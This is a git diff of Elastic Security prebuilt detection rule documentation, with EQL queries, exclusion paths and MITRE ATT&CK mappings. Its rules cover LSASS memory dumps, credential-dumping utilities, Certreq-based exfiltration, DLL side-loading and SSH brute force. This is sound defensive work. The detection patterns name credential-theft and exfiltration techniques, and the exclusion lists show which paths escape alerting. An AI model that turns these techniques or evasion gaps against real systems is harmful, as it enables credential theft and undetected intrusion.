+*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Data Source: Elastic Defend +* Rule Type: BBR + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type == "creation" and + + /* MDMP header */ + file.Ext.header_bytes : "4d444d50*" and file.size >= 30000 and + not + + ( + ( + process.executable : ( + "?:\\Windows\\System32\\WerFault.exe", + "?:\\Windows\\SysWOW64\\WerFault.exe", + "?:\\Windows\\System32\\Wermgr.exe", + "?:\\Windows\\SysWOW64\\Wermgr.exe", + "?:\\Windows\\System32\\WerFaultSecure.exe", + "?:\\Windows\\System32\\WUDFHost.exe", + "?:\\Windows\\System32\\Taskmgr.exe", + "?:\\Windows\\SysWOW64\\Taskmgr.exe", + "?:\\Program Files\\*.exe", + "?:\\Program Files (x86)\\*.exe", + "?:\\Windows\\SystemApps\\*.exe", + "?:\\Users\\*\\AppData\\Roaming\\Zoom\\bin\\zCrashReport64.exe" + ) and process.code_signature.trusted == true + ) or + ( + file.path : ( + "?:\\ProgramData\\Microsoft\\Windows\\WER\\*", + "?:\\ProgramData\\Microsoft\\WDF\\*", + "?:\\ProgramData\\Alteryx\\ErrorLogs\\*", + "?:\\ProgramData\\Goodix\\*", + "?:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\CrashDumps\\*", + "?:\\Users\\*\\AppData\\Roaming\\Zoom\\logs\\zoomcrash*", + "?:\\Users\\*\\AppData\\*\\Crashpad\\*", + "?:\\Users\\*\\AppData\\*\\crashpaddb\\*", + "?:\\Users\\*\\AppData\\*\\HungReports\\*", + "?:\\Users\\*\\AppData\\*\\CrashDumps\\*", + "?:\\Users\\*\\AppData\\*\\NativeCrashReporting\\*" + ) and (process.code_signature.trusted == true or process.executable == null) + ) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: LSASS Memory +** ID: T1003.001 +** Reference URL: https://attack.mitre.org/techniques/T1003/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-renamed-com-services-dll.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-renamed-com-services-dll.asciidoc index 07beff23d5..684adc6f9e 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-renamed-com-services-dll.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-renamed-com-services-dll.asciidoc @@ -30,9 +30,10 @@ Identifies suspicious renamed COMSVCS.DLL Image Load, which exports the MiniDump * OS: Windows * Use Case: Threat Detection * Tactic: Credential Access +* Tactic: Defense Evasion * Data Source: Sysmon Only -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -78,3 +79,15 @@ sequence by process.entity_id with maxspan=1m ** Name: LSASS Memory ** ID: T1003.001 ** Reference URL: https://attack.mitre.org/techniques/T1003/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-trusted-developer-utility.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-trusted-developer-utility.asciidoc index 801b797ec8..8b53911a47 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-trusted-developer-utility.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-trusted-developer-utility.asciidoc @@ -29,10 +29,11 @@ An instance of MSBuild, the Microsoft Build Engine, loaded DLLs (dynamically lin * OS: Windows * Use Case: Threat Detection * Tactic: Credential Access +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -123,3 +124,27 @@ sequence by process.entity_id ** Name: OS Credential Dumping ** ID: T1003 ** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: Security Account Manager +** ID: T1003.002 +** Reference URL: https://attack.mitre.org/techniques/T1003/002/ +* Technique: +** Name: Credentials from Password Stores +** ID: T1555 +** Reference URL: https://attack.mitre.org/techniques/T1555/ +* Sub-technique: +** Name: Windows Credential Manager +** ID: T1555.004 +** Reference URL: https://attack.mitre.org/techniques/T1555/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-windows-utilities.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-windows-utilities.asciidoc index 5c5d6daae6..e4581a569b 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-windows-utilities.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-windows-utilities.asciidoc @@ -33,11 +33,12 @@ Identifies the execution of known Windows utilities often abused to dump LSASS m * OS: Windows * Use Case: Threat Detection * Tactic: Credential Access +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 108 +*Version*: 109 *Rule authors*: @@ -144,3 +145,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: NTDS ** ID: T1003.003 ** Reference URL: https://attack.mitre.org/techniques/T1003/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-curl-cve-2023-38545-exploitation.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-curl-cve-2023-38545-exploitation.asciidoc index 22e17b49e2..451f11779c 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-curl-cve-2023-38545-exploitation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-curl-cve-2023-38545-exploitation.asciidoc @@ -34,7 +34,7 @@ Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerab * Tactic: Execution * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-destination-port.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-destination-port.asciidoc new file mode 100644 index 0000000000..dcc45c26c8 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-destination-port.asciidoc @@ -0,0 +1,58 @@ +[[potential-data-exfiltration-activity-to-an-unusual-destination-port]] +=== Potential Data Exfiltration Activity to an Unusual Destination Port + +A machine learning job has detected data exfiltration to a particular destination port. Data transfer patterns that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-6h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over C2 Channel +** ID: T1041 +** Reference URL: https://attack.mitre.org/techniques/T1041/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-ip-address.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-ip-address.asciidoc new file mode 100644 index 0000000000..cb25cec05d --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-ip-address.asciidoc @@ -0,0 +1,58 @@ +[[potential-data-exfiltration-activity-to-an-unusual-ip-address]] +=== Potential Data Exfiltration Activity to an Unusual IP Address + +A machine learning job has detected data exfiltration to a particular geo-location (by IP address). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-6h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over C2 Channel +** ID: T1041 +** Reference URL: https://attack.mitre.org/techniques/T1041/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-iso-code.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-iso-code.asciidoc new file mode 100644 index 0000000000..891bb3006f --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-iso-code.asciidoc @@ -0,0 +1,58 @@ +[[potential-data-exfiltration-activity-to-an-unusual-iso-code]] +=== Potential Data Exfiltration Activity to an Unusual ISO Code + +A machine learning job has detected data exfiltration to a particular geo-location (by region name). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-6h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over C2 Channel +** ID: T1041 +** Reference URL: https://attack.mitre.org/techniques/T1041/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-region.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-region.asciidoc new file mode 100644 index 0000000000..aac0aa8fff --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-region.asciidoc @@ -0,0 +1,58 @@ +[[potential-data-exfiltration-activity-to-an-unusual-region]] +=== Potential Data Exfiltration Activity to an Unusual Region + +A machine learning job has detected data exfiltration to a particular geo-location (by region name). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-6h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over C2 Channel +** ID: T1041 +** Reference URL: https://attack.mitre.org/techniques/T1041/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-defense-evasion-via-proot.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-defense-evasion-via-proot.asciidoc index 383e7243eb..284fef1322 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-defense-evasion-via-proot.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-defense-evasion-via-proot.asciidoc @@ -31,7 +31,7 @@ Identifies the execution of the PRoot utility, an open-source tool for user-spac * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-dga-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-dga-activity.asciidoc new file mode 100644 index 0000000000..98e37507fe --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-dga-activity.asciidoc @@ -0,0 +1,58 @@ +[[potential-dga-activity]] +=== Potential DGA Activity + +A population analysis machine learning job detected potential DGA (domain generation algorithm) activity. Such activity is often used by malware command and control (C2) channels. This machine learning job looks for a source IP address making DNS requests that have an aggregate high probability of being DGA activity. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/dga + +*Tags*: + +* Use Case: Domain Generation Algorithm Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Command and Control + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-disabling-of-apparmor.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-disabling-of-apparmor.asciidoc index 2976c17e9e..9cd02928be 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-disabling-of-apparmor.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-disabling-of-apparmor.asciidoc @@ -29,7 +29,7 @@ This rule monitors for potential attempts to disable AppArmor. AppArmor is a Lin * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-disabling-of-selinux.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-disabling-of-selinux.asciidoc index dbc5c5afe2..2125a77db0 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-disabling-of-selinux.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-disabling-of-selinux.asciidoc @@ -32,7 +32,7 @@ Identifies potential attempts to disable Security-Enhanced Linux (SELinux), whic * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-dll-side-loading-via-trusted-microsoft-programs.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-dll-side-loading-via-trusted-microsoft-programs.asciidoc new file mode 100644 index 0000000000..bd9f618a4b --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-dll-side-loading-via-trusted-microsoft-programs.asciidoc @@ -0,0 +1,89 @@ +[[potential-dll-side-loading-via-trusted-microsoft-programs]] +=== Potential DLL Side-Loading via Trusted Microsoft Programs + +Identifies an instance of a Windows trusted program that is known to be vulnerable to DLL Search Order Hijacking starting after being renamed or from a non-standard path. This is uncommon behavior and may indicate an attempt to evade defenses via side loading a malicious DLL within the memory space of one of those processes. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.pe.original_file_name in ("WinWord.exe", "EXPLORER.EXE", "w3wp.exe", "DISM.EXE") and + not (process.name : ("winword.exe", "explorer.exe", "w3wp.exe", "Dism.exe") or + process.executable : ("?:\\Windows\\explorer.exe", + "?:\\Program Files\\Microsoft Office\\root\\Office*\\WINWORD.EXE", + "?:\\Program Files?(x86)\\Microsoft Office\\root\\Office*\\WINWORD.EXE", + "?:\\Windows\\System32\\Dism.exe", + "?:\\Windows\\SysWOW64\\Dism.exe", + "?:\\Windows\\System32\\inetsrv\\w3wp.exe") + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: DLL Side-Loading +** ID: T1574.002 +** Reference URL: https://attack.mitre.org/techniques/T1574/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-dns-tunneling-via-nslookup.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-dns-tunneling-via-nslookup.asciidoc index 81c6d30ab3..a005151708 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-dns-tunneling-via-nslookup.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-dns-tunneling-via-nslookup.asciidoc @@ -36,7 +36,7 @@ This rule identifies a large number (15) of nslookup.exe executions with an expl * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -109,3 +109,7 @@ event.category:process and host.os.type:windows and event.type:start and process ** Name: DNS ** ID: T1071.004 ** Reference URL: https://attack.mitre.org/techniques/T1071/004/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-external-linux-ssh-brute-force-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-external-linux-ssh-brute-force-detected.asciidoc index aae8d73d26..43d3ea5a57 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-external-linux-ssh-brute-force-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-external-linux-ssh-brute-force-detected.asciidoc @@ -17,7 +17,7 @@ Identifies multiple external consecutive login failures targeting a user account *Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) -*Maximum alerts per execution*: 100 +*Maximum alerts per execution*: 5 *References*: None @@ -28,7 +28,7 @@ Identifies multiple external consecutive login failures targeting a user account * Use Case: Threat Detection * Tactic: Credential Access -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -87,7 +87,7 @@ In case this rule generates too much noise and external brute forcing is of not [source, js] ---------------------------------- -sequence by host.id, source.ip, user.name with maxspan=5s +sequence by host.id, source.ip, user.name with maxspan=15s [ authentication where host.os.type == "linux" and event.action in ("ssh_login", "user_login") and event.outcome == "failure" and not cidrmatch(source.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", diff --git a/docs/detections/prebuilt-rules/rule-details/potential-file-transfer-via-certreq.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-file-transfer-via-certreq.asciidoc new file mode 100644 index 0000000000..6d6e639b68 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-file-transfer-via-certreq.asciidoc @@ -0,0 +1,84 @@ +[[potential-file-transfer-via-certreq]] +=== Potential File Transfer via Certreq + +Identifies Certreq making an HTTP Post request. Adversaries could abuse Certreq to download files or upload data to a remote URL. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://lolbas-project.github.io/lolbas/Binaries/Certreq/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Command and Control +* Tactic: Exfiltration +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : "CertReq.exe" or process.pe.original_file_name == "CertReq.exe") and process.args : "-Post" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Ingress Tool Transfer +** ID: T1105 +** Reference URL: https://attack.mitre.org/techniques/T1105/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Web Service +** ID: T1567 +** Reference URL: https://attack.mitre.org/techniques/T1567/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-hidden-process-via-mount-hidepid.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-hidden-process-via-mount-hidepid.asciidoc index 420191d32a..90bd22d193 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-hidden-process-via-mount-hidepid.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-hidden-process-via-mount-hidepid.asciidoc @@ -31,7 +31,7 @@ Identifies the execution of mount process with hidepid parameter, which can make * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-internal-linux-ssh-brute-force-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-internal-linux-ssh-brute-force-detected.asciidoc index 1bd9361db4..61a249da85 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-internal-linux-ssh-brute-force-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-internal-linux-ssh-brute-force-detected.asciidoc @@ -17,7 +17,7 @@ Identifies multiple internal consecutive login failures targeting a user account *Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) -*Maximum alerts per execution*: 100 +*Maximum alerts per execution*: 5 *References*: None @@ -28,7 +28,7 @@ Identifies multiple internal consecutive login failures targeting a user account * Use Case: Threat Detection * Tactic: Credential Access -*Version*: 7 +*Version*: 8 *Rule authors*: @@ -83,7 +83,7 @@ The rule identifies consecutive internal SSH login failures targeting a user acc [source, js] ---------------------------------- -sequence by host.id, source.ip, user.name with maxspan=5s +sequence by host.id, source.ip, user.name with maxspan=15s [ authentication where host.os.type == "linux" and event.action in ("ssh_login", "user_login") and event.outcome == "failure" and cidrmatch(source.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", diff --git a/docs/detections/prebuilt-rules/rule-details/potential-lateral-tool-transfer-via-smb-share.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-lateral-tool-transfer-via-smb-share.asciidoc index 58be9bdc9f..b3f213986f 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-lateral-tool-transfer-via-smb-share.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-lateral-tool-transfer-via-smb-share.asciidoc @@ -8,8 +8,6 @@ Identifies the creation or change of a Windows executable file over network shar *Rule indices*: * logs-endpoint.events.* -* winlogbeat-* -* logs-windows.* *Severity*: medium @@ -32,7 +30,7 @@ Identifies the creation or change of a Windows executable file over network shar * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -100,7 +98,8 @@ sequence by host.id with maxspan=30s network.transport == "tcp" and source.ip != "127.0.0.1" and source.ip != "::1" ] by process.entity_id /* add more executable extensions here if they are not noisy in your environment */ - [file where host.os.type == "windows" and event.type in ("creation", "change") and process.pid == 4 and file.extension : ("exe", "dll", "bat", "cmd")] by process.entity_id + [file where host.os.type == "windows" and event.type in ("creation", "change") and process.pid == 4 and + (file.Ext.header_bytes : "4d5a*" or file.extension : ("exe", "scr", "pif", "com", "dll"))] by process.entity_id ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/potential-linux-backdoor-user-account-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-linux-backdoor-user-account-creation.asciidoc index fb11b2fdf8..feee757804 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-linux-backdoor-user-account-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-linux-backdoor-user-account-creation.asciidoc @@ -32,7 +32,7 @@ Identifies the attempt to create a new backdoor user by setting the user's UID t * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -93,6 +93,7 @@ This rule identifies the usage of the `usermod` command to set a user's UID to 0 - Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. - Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + ---------------------------------- ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/potential-linux-credential-dumping-via-proc-filesystem.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-linux-credential-dumping-via-proc-filesystem.asciidoc index b5c6d9f6f5..1a3bf491f6 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-linux-credential-dumping-via-proc-filesystem.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-linux-credential-dumping-via-proc-filesystem.asciidoc @@ -33,7 +33,7 @@ Identifies the execution of the mimipenguin exploit script which is linux adapta * Use Case: Vulnerability * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-linux-credential-dumping-via-unshadow.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-linux-credential-dumping-via-unshadow.asciidoc index fd5c481be7..fe2c102bd8 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-linux-credential-dumping-via-unshadow.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-linux-credential-dumping-via-unshadow.asciidoc @@ -33,7 +33,7 @@ Identifies the execution of the unshadow utility which is part of John the Rippe * Tactic: Credential Access * Data Source: Elastic Defend -*Version*: 4 +*Version*: 5 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-linux-hack-tool-launched.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-linux-hack-tool-launched.asciidoc new file mode 100644 index 0000000000..4655d7ee0e --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-linux-hack-tool-launched.asciidoc @@ -0,0 +1,73 @@ +[[potential-linux-hack-tool-launched]] +=== Potential Linux Hack Tool Launched + +Monitors for the execution of different processes that might be used by attackers for malicious intent. An alert from this rule should be investigated further, as hack tools are commonly used by blue teamers and system administrators as well. + +*Rule type*: eql + +*Rule indices*: + 